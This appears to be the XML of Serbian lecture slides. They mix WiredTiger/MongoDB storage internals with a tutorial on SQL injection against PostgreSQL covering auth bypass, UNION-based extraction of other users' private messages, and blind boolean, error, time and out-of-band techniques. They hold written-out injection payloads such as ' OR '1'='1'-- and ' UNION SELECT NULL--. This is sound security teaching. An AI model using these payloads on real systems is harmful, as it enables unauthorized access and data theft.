              <a:t>) predstavljaju stranice koje sadrže samo ključeve i pokazivače na druge stranice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Listovi sadrže sve ključeve, ali i vrednosti. Takođe, ponekad sadrže i reference na </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>stranice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, koje se koriste kada podatak premašuje maksimalnu veličinu jedne stranice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Kod B+ stabala su susedni listovi obično povezani u lančanu listu, što nije slučaj kod WiredTiger implementacije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Kada je potrebno preći sa jednog lista na susedni, obilazak se vrši preko roditelja jer se garantuje da će i on biti u keš memoriji dok se obrađuje njegov sledbenik, tj. originalni list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Sadržaj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Injection (SQLi) napadi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NoSQL Injection (NoSQLi) napadi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(SQLi) napadi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;29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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>a trećem mestu liste deset najčešćih sigurnosnih ranjivosti iz 2021. godine (OWASP)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Namera je manipulacija upita koji je korišćen od strane baze podataka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Umetanje (,,injekcija’’) specifično kreiranog teksta (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) kako bi se promenila ili zaobišla logika upita i kao rezultat dobili podaci koji nisu predviđeni, ili zaobišla sama aplikativna logika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Otkrivanje mogućnosti za SQLi napadom</a:t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Reconnaissance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- otkrivanje tačaka gde je potencijalno moguće izvršiti SQLi napad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Uobičajena mesta za proveru uključuju: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Forme za autentifikaciju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Forme koje prihvataju korisnički unos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URL parametre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HTTP zaglavlja (npr. User-Agent, Referer, Cookie…)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Ponašanja koja mogu ukazati na prisustvo SQLi ranjivosti su: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Poruke koje ukazuju na greške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Greške i/ili neočekivano ponašanje prilikom obrade SQL-specifičnih karaktera i izraza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SQL Injection (SQLi) napadi - Podela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Napadi na logiku upita i čitanje podataka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Napadi sa ciljem manipulacije baze podataka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Remote Code Execution (RCE) preko SQLi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Primeri dati za </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> bazu podataka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Napadi na logiku upita i čitanje podataka</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;315;p56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Otkrivanje skrivenih podataka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Zaobilazaženje logike upita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Otkrivanje podataka iz drugih tabela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UNION napadi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Upiti za prikupljanje informacija o bazi podataka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Blind SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - U slučaju da aplikacija ne vraća vidljive rezultate i/ili informacije o greškama, napadi koji se sprovode nazivaju se </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Blind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Boolean-based napadi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Error-based napadi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Time-based napadi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Out-of-Band napadi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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Otkrivanje skrivenih podataka</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Google Shape;321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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ajčešće se payload umeće u okviru </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> klauzule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Primer:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>profiles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>tabela. Upit vraća podatke o nalozima na osnovu uloge (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>), pod uslovom da korisnički profil nije privatan (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="322" name="Google Shape;32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2571739"/>
            <a:ext cx="8832299" cy="1197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 Otkrivanje skrivenih podataka</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Google Shape;328;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="43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Umetanje SQL-specifičnih karaktera i ključnih reči, kao što je apostrof ( </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Cilj: prikazivanje svih korisničkih naloga, nezavisno od njihove uloge u sistemu, kao ni privatnosti samih naloga</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="329" name="Google Shape;3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63" y="900225"/>
            <a:ext cx="8616074" cy="12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75" y="2905523"/>
            <a:ext cx="8256625" cy="2237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Zaobilazaženje logike upita</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336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Primer:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> autentifikacija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Cilj: prijava korisnika samo na osnovu korisničkog imena/email adrese, bez poznavanja lozinke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025" y="2571750"/>
            <a:ext cx="7857949" cy="14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2) Zaobilazaženje logike upita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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="495050"/>
            <a:ext cx="8520600" cy="43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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>oguće je iskoristiti prethodno definisan payload </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>' OR '1'='1'--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> umesto korisničkog imena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Aplikacija koristi</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> fetchone()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, te je kao rezultat vraćen samo prvi red, u ovom slučaju administratorski nalog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Alternativni payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>user1'--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887" y="1256510"/>
            <a:ext cx="7296226" cy="11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975" y="3598101"/>
            <a:ext cx="7762048" cy="14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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="11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3a) Otkrivanje podataka iz drugih tabela - UNION napadi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Google Shape;351;p6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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>roširivanje upita korišćenjem </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> operatora, koji omogućuje kombinovanje rezultata dva ili više </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> izraza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Koraci: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Određivanje broja kolona originalnog upita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Određivanje kompatibilnih tipova podataka između kolona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176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Organizacija stabla u WiredTiger-u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863550"/>
            <a:ext cx="8520600" cy="4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Stranica se popunjava dodavanjem novog zapisa i oni su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>logički</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> sortirani na osnovu ključa unutar stranice, čime se omogućuje efikasna pretraga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Kada stranica dostigne definisanu granicu u veličini dolazi do Page Split operacije, što dovodi do razdvajanja stranice na dve, prebacivanja nekih podataka sa originalne na novu stranicu, a zatim dodavanja novog zapisa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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1564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3a) Otkrivanje podataka iz drugih tabela - UNION napadi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Određivanje broja kolona originalnog upita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Pristupi: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n"/>
              <a:t>Korišćenje </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>' ORDER BY n--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> klauzula, gde </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> počinje od broja </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> i redom se inkrementira dok ne dođe do greške u izvršenju upita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n"/>
              <a:t>Kreiranje </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>' UNION SELECT NULL-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>podupita, povećavajući broj </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> parametara redom dok ne dođe do greške u izvršenju upita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Greška bi se pojavila kada bi broj </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ili broj </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> parametara premašio broj kolona u tabeli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3a) Otkrivanje podataka iz drugih tabela - UNION napadi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Određivanje broja kolona originalnog upita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63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(1) Korišćenje </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>' ORDER BY n--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> klauzula, gde </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> počinje od broja </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> i redom se inkrementira dok ne dođe do greške u izvršenju upita</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="364" name="Google Shape;36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251" y="1706750"/>
            <a:ext cx="7183501" cy="315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3a) Otkrivanje podataka iz drugih tabela - UNION napadi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Određivanje broja kolona originalnog upita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6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(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Kreiranje ' UNION SELECT NULL-- podupita, povećavajući broj NULL parametara redom dok ne dođe do greške u izvršenju upita</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="371" name="Google Shape;37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537" y="1638150"/>
            <a:ext cx="6794925" cy="33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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1564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3a) Otkrivanje podataka iz drugih tabela - UNION napadi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Određivanje kompatibilnih tipova podataka između kolona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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1154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Neophodno je p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>okomponentno poklapanje tipova podataka kolona između originalnog upita i podupita definisanog malicioznim payload-om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Najčešće su u pitanju stringovi, te je potrebno naći koja kolona iz originalnog upita sadrži string-kompatibilne podatke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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1564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3a) Otkrivanje podataka iz drugih tabela - UNION napadi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Određivanje kompatibilnih tipova podataka između kolona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6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Kada je ustanovljen broj kolona koje vraća upit, moguće je iskoristiti payload koji sadrži </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> operator i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> parametre tako što se redom, po jedan </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> parametar zameni proizvoljnim stringom</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="384" name="Google Shape;38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26096"/>
            <a:ext cx="8520599" cy="2852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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1564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3a) Otkrivanje podataka iz drugih tabela - UNION napadi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Određivanje kompatibilnih tipova podataka između kolona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7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Kada se proizvoljan string stavi na poziciji prvog ili drugog NULL parametra, dolazi do greške u izvršenju upita zato što originalan upit na tim pozicijama sadrži po ceo broj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Ukoliko bi se proizvoljan string stavio na poziciji trećeg NULL parametra, upit bi se uspešno izvršio jer originalan upit na toj poziciji sadrži string</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="391" name="Google Shape;39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262" y="2777274"/>
            <a:ext cx="7491476" cy="22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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1564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3a) Otkrivanje podataka iz drugih tabela - UNION napadi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Primer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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="863550"/>
            <a:ext cx="930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Funkcija koja za zadat šablon korisničkog imena prikazuje osnovne informacije o korisnicima iz tabele </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>users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Cilj ovog napada je preuzeti privatne poruke svakog korisnika iz tabele </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>messages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, koja sadrži atribute </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>body</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="398" name="Google Shape;39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675" y="1619899"/>
            <a:ext cx="7975551" cy="172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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1564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3a) Otkrivanje podataka iz drugih tabela - UNION napadi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Primer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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="717300"/>
            <a:ext cx="9300900" cy="48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Broj kolona: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Potrebno uskladiti tipove podataka između kolona dveju tabela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Obe tabele sadrže kolone koje se odnose na identifikatore, tj. cele brojeve, te je potrebno atribut </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> iz tabele </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>messages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> postaviti na prvo mesto u payload-u, a zatim stringove </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> zbog poklapanja sa </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> kolonama iz tabele </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. Na kraju je u payload-u potrebno dodati </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> parametar da bi se ispoštovao uslov za broj kolona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225" y="1099075"/>
            <a:ext cx="7156449" cy="17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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1564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3a) Otkrivanje podataka iz drugih tabela - UNION napadi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Primer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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="717300"/>
            <a:ext cx="9300900" cy="48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150" y="1010863"/>
            <a:ext cx="6985676" cy="387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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-97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3a) Otkrivanje podataka iz drugih tabela - UNION napadi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Primer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71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="620250"/>
            <a:ext cx="9300900" cy="48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Dodatne mogućnosti proširivanja upita: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Konkatenacija stringova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Dodavanje </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> uslova</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="419" name="Google Shape;41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50" y="1499401"/>
            <a:ext cx="7645600" cy="14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5725" y="3045675"/>
            <a:ext cx="6889450" cy="20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Non-clustered indeksi i Clustered Collections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Indeksi su po prirodi Non-clustered u okviru MongoDB-a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 okviru svake kolekcije se automatski indeksira </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> polje, ali kao Non-clustered kolekcija -&gt; kreira se nova struktura koja je odvojena od dokumenata koja se indeksiraju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 obzirom da je prvo potrebno obići indeks kreiran nad </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> poljem pre dolaženja do konkretnih podataka, ovo znači da su potrebne dve operacije upisa prilikom kreiranja, ažuriranja i brisanja zapisa, kao i dve operacije čitanja prilikom izvršenja takvih upita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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207925" y="222700"/>
            <a:ext cx="87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3b) Otkrivanje podataka iz drugih tabela - Upiti za prikupljanje informacija o bazi podataka</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Google Shape;426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Primeri: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Prikazivanje v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>erzije baze podataka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Prikazivanje informacija o tabelama (metapodataka)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Prikazivanje korisnika i grupa (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>roles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>), kao i njihovih privilegija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87" y="2780950"/>
            <a:ext cx="7811375" cy="163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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207925" y="222700"/>
            <a:ext cx="87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3b) Otkrivanje podataka iz drugih tabela - Upiti za prikupljanje informacija o bazi podataka</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Google Shape;433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25" y="1826051"/>
            <a:ext cx="7136600" cy="24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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207925" y="222700"/>
            <a:ext cx="87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3b) Otkrivanje podataka iz drugih tabela - Upiti za prikupljanje informacija o bazi podataka</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440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50" y="2063337"/>
            <a:ext cx="8716500" cy="1416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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207925" y="222700"/>
            <a:ext cx="87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3b) Otkrivanje podataka iz drugih tabela - Upiti za prikupljanje informacija o bazi podataka</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Google Shape;447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250" y="1404249"/>
            <a:ext cx="7373850" cy="29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207925" y="222700"/>
            <a:ext cx="87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3b) Otkrivanje podataka iz drugih tabela - Upiti za prikupljanje informacija o bazi podataka</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Google Shape;454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63" y="1495424"/>
            <a:ext cx="861607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4a) Blind SQLi - Boolean-based napadi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77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Uticanje na logiku originalnog upita tako da se izazove primetna razlika u odgovoru aplikacije u zavisnosti od tačnosti dodatog uslova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Primer:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Otkrivanje broja i pojedinačnih karaktera korisničke lozinke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50" y="2061124"/>
            <a:ext cx="7729699" cy="20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4a) Blind SQLi - Boolean-based napadi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78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25" y="1066675"/>
            <a:ext cx="7243949" cy="3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4b) Blind SQLi - Error-based napadi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Google Shape;475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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>amerno izazivanje greške u bazi podataka kako bi se otkrile informacije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 primer, deljenjem nulom ili konverzijom neadekvatnih tipova može se generisati poruka o grešci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38" y="2571750"/>
            <a:ext cx="7936724" cy="8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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="572700"/>
            <a:ext cx="8520600" cy="43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Predstavljaju primenu šireg koncepta poznatog kao </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Timing Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, klasu side-channel napada u kojima napadač meri vreme izvršavanja različitih operacija kako bi zaključio informacije o stanju sistema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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>rimer payload-a koji izaziva kašnjenje ukoliko je uslov specificiranog podupita ispunjen:</a:t>
            </a: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Ispitivanje vrednosti prvog karaktera administratorske lozinke, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>do kašnjenja u izvršenju upita dolazi ako je uslov tačan:</a:t>
            </a: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482" name="Google Shape;482;p8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4c) Blind SQLi - Time-based napadi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="483" name="Google Shape;48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50" y="2298988"/>
            <a:ext cx="8286099" cy="7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04" y="3957575"/>
            <a:ext cx="8143184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4d) Blind SQLi - Out-of-Band napadi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Google Shape;490;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="572700"/>
            <a:ext cx="85206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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>oriste se alternativni (spoljašnji) kanali kako bi informacije iz baze podataka bile poslate napadaču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Alternativni kanali podrazumevaju server pod kontrolom napadača, gde bi se podaci slali putem HTTP, DNS ili sličnih protokola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Payload se kreira tako da baza podataka izvrši određenu akciju koja izaziva komunikaciju ka eksternom serveru napadača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Korišćenje </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
